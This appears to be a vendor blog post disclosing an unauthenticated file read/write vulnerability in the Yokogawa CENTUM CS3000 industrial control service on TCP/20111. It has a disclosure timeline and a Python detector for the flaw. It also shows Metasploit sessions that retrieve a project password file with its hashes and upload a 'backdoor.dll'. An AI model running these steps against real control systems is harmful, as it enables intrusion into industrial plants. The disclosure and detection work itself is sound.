This blog post represents the final disclosure of the Yokogawa CENTUM CS3000 vulnerability discussed by Tod Beardsley (@todb) and Jim Denaro (@cipherlaw) in their DEFCON talk, "How To Disclose an Exploit Without Getting in Trouble". A link to that talk, and the slides, will be available shortly.

Let's start with a quote from the Yokogawa description of their own product in order to introduce it: "Yokogawa released CENTUM CS 3000 R3 in 1998 as the first Windows-based production control system under our brand. For over 10 years of continuous developments and enhancements, CENTUM CS 3000 R3 is equipped with functions to make it a matured system. With over 7600 systems sold worldwide, it is a field-proven system with 99.99999% of availability."

Vulnerability Summary

The Yokogawa Centum CS3000 solution uses several services to provide its functionality. The “BKBCopyD.exe” service, started when running the “FCS / Test Function”, listens by default on TCP/20111. It performs no authentication, so anyone able to reach the port can abuse several of the operations it provides in order to:

  • Leak the CENTUM project database location.
  • Read arbitrary files.
  • Write arbitrary files.

Reading and Writing to the file system will happen with the privileges of the CENTUM user.

Disclosure Timeline

Date            Description
March, 2014     Client-Attorney Relationship Established between Cipherlaw Group and Rapid7
April 14, 2014  Vulnerability details disclosed to attorney
May 1, 2014     Details offered to vendor
June 25, 2014   Details disclosed to CERTs
Aug 9, 2014     Details, Metasploit module published as PR 3637

Technical Analysis

The “BKBCopyD.exe” service provides several operations, which can be abused without further authentication by anyone with network access to the service. The operations are described below:

  • PMODE: this command returns the values of environment variables. These include the MR_DBPATH variable, which holds the project path on the local file system or on a network resource.
  • RETR: this command reads arbitrary files from the remote file system with the privileges of the CENTUM user. Neither the service nor the command provides any additional authentication or authorization mechanism.
  • STOR: this command stores arbitrary files on the remote file system with the privileges of the CENTUM user. Neither the service nor the command provides any additional authentication or authorization mechanism.
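Because the service itself cannot be made to authenticate, the practical defensive control is to watch who talks to TCP/20111 and what they ask for. The following detector is an added example written for this post (it is not Rapid7's or Yokogawa's code). It assumes a constructed, simplified log format of "src dst dport first-payload-line", as a network sensor that reconstructs TCP payloads might emit, and an assumed allow-list of engineering workstations; the port number, the operation names and the Password.odc path are taken from the post.

```python
"""Flag BKBCopyD (TCP/20111) PMODE/RETR/STOR requests from unexpected sources.

Added example for this post, not Rapid7's or Yokogawa's code. The log format,
the allow-list and the sample records below are constructed for illustration.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Iterable, List, Optional, Tuple

BKBCOPYD_PORT = 20111

# Severity follows the impact described in the post: PMODE leaks the project
# path, RETR reads arbitrary files, STOR writes arbitrary files as CENTUM user.
OPERATION_SEVERITY = {"PMODE": "medium", "RETR": "high", "STOR": "critical"}

# Constructed allow-list: engineering workstations expected to use the
# FCS test function. Any other source is treated as unauthorised.
ENGINEERING_HOSTS = [ip_network("172.17.1.0/28")]

# Constructed log lines in the assumed "src dst dport payload" format.
SAMPLE_LOG = """\
172.17.1.5 172.17.1.63 20111 PMODE
10.0.0.77 172.17.1.63 20111 PMODE
10.0.0.77 172.17.1.63 20111 RETR C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/Password.odc
10.0.0.77 172.17.1.63 20111 STOR C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/backdoor.dll
10.0.0.77 172.17.1.63 443 GET /index.html
malformed line
"""


@dataclass(frozen=True)
class Alert:
    src: str
    dst: str
    operation: str
    argument: str
    severity: str


def _is_engineering_host(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in ENGINEERING_HOSTS)


def parse_record(line: str) -> Optional[Tuple[str, str, int, str]]:
    """Split one log line into (src, dst, dport, payload); None if malformed."""
    parts = line.strip().split(" ", 3)
    if len(parts) < 4:
        return None
    src, dst, dport, payload = parts
    try:
        return src, dst, int(dport), payload
    except ValueError:
        return None


def detect(lines: Iterable[str]) -> List[Alert]:
    """Return one Alert per BKBCopyD operation seen on TCP/20111."""
    alerts: List[Alert] = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        src, dst, dport, payload = rec
        if dport != BKBCOPYD_PORT:
            continue
        tokens = payload.split(" ", 1)
        op = tokens[0].upper()
        if op not in OPERATION_SEVERITY:
            continue
        arg = tokens[1] if len(tokens) > 1 else ""
        severity = OPERATION_SEVERITY[op]
        # Reading the project password database is as bad as a write.
        if op == "RETR" and arg.lower().endswith("password.odc"):
            severity = "critical"
        # Expected engineering hosts are still recorded, but only as "info":
        # the service does no authentication, so the audit trail lives here.
        if _is_engineering_host(src):
            severity = "info"
        alerts.append(Alert(src, dst, op, arg, severity))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG.splitlines()):
        print(f"[{a.severity:8}] {a.src} -> {a.dst} {a.operation} {a.argument}")
```

Run against the constructed sample, the allow-listed workstation's PMODE is logged at "info", the outside host's PMODE at "medium", and its RETR of Password.odc and STOR of a DLL both at "critical"; the HTTPS flow and the malformed line are ignored. In a real deployment the allow-list should be as small as the engineering process permits, and any non-"info" alert on this port deserves the same response as a credential compromise, since the CENTUM user's files are fully exposed.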

Exploitation

A working Metasploit module has been developed for Windows XP SP3 / Yokogawa Centum CS3000 R3.08.50, where it is possible to leak the database location and retrieve and store arbitrary files:

  • Retrieving the database location with PMODE:
msf > use auxiliary/admin/scada/yokogawa_bkbcopyd_client
msf auxiliary(yokogawa_bkbcopyd_client) > set RHOST 172.17.1.63
RHOST => 172.17.1.63
msf auxiliary(yokogawa_bkbcopyd_client) > set action PMODE
action => PMODE
msf auxiliary(yokogawa_bkbcopyd_client) > run
 
 
[*] 172.17.1.63: 20111 - Sending PMODE packet...
[+] Success: 210 PMODE C:\CS3000\ENG\BKPROJECT\MYPJT\TestMaster\HIS0163\database command successful
  • Retrieving the project password database location with RETR:
msf auxiliary(yokogawa_bkbcopyd_client) > set action RETR
action => RETR
msf auxiliary(yokogawa_bkbcopyd_client) > set RPATH C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/Password.odc
RPATH => C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/Password.odc
msf auxiliary(yokogawa_bkbcopyd_client) > run
 
 
[*] 172.17.1.63: 20111 - Sending RETR packet...
[*] Server started.
[*] 172.17.1.63 - Getting data...
[+] /Users/redsadic/.msf4/loot/20140806223145_default_172.17.1.63_yokogawa.cs3000._ 687005.bin saved!
[*] 172.17.1.63 - Getting data...
[*] Server stopped.
[*] Auxiliary module execution completed
msf auxiliary(yokogawa_bkbcopyd_client) > cat /Users/redsadic/.msf4/loot/20140806223145_default_172.17.1.63_yokogawa.cs3000._ 687005.bin
[*] exec: cat /Users/redsadic/.msf4/loot/20140806223145_default_172.17.1.63_yokogawa.cs3000._ 687005.bin
 
 
#YDCS_PASSWORD PROJECT: MYPJT
OFFUSER:01a742f640f8a4c0b57feb7ae6e29099:1391182083
ONUSER:aad21bd26dae81dce52741595bea7beb:1391182083
ENGUSER:2550cc2337fcd119327b8d730476cfdc:1391182083
PROG:b08f11a7e028f607009ba4039d9bda0e:1391182083
TESTUSER:2dc22e16cbfae90fafd1a5d84e09b48f:1391182083
#!2712db741f4af7718f74fd179deacbe3msf
  • Placing remote files with STOR:
msf auxiliary(yokogawa_bkbcopyd_client) > set action STOR
action => STOR
msf auxiliary(yokogawa_bkbcopyd_client) > set LPATH /tmp/backdoor.dll
LPATH => /tmp/backdoor.dll
msf auxiliary(yokogawa_bkbcopyd_client) > set RPATH C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/backdoor.dll
RPATH => C:/CS3000/ENG/BKPROJECT/MYPJT/TestMaster/HIS0163/database/system/backdoor.dll
msf auxiliary(yokogawa_bkbcopyd_client) > run
 
 
[*] 172.17.1.63: 20111 - Sending STOR packet...
[*] Server started.
[*] 172.17.1.63 - Sending data...
[*] Server stopped.
[*] Auxiliary module execution completed
msf auxiliary(yokogawa_bkbcopyd_client) >

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.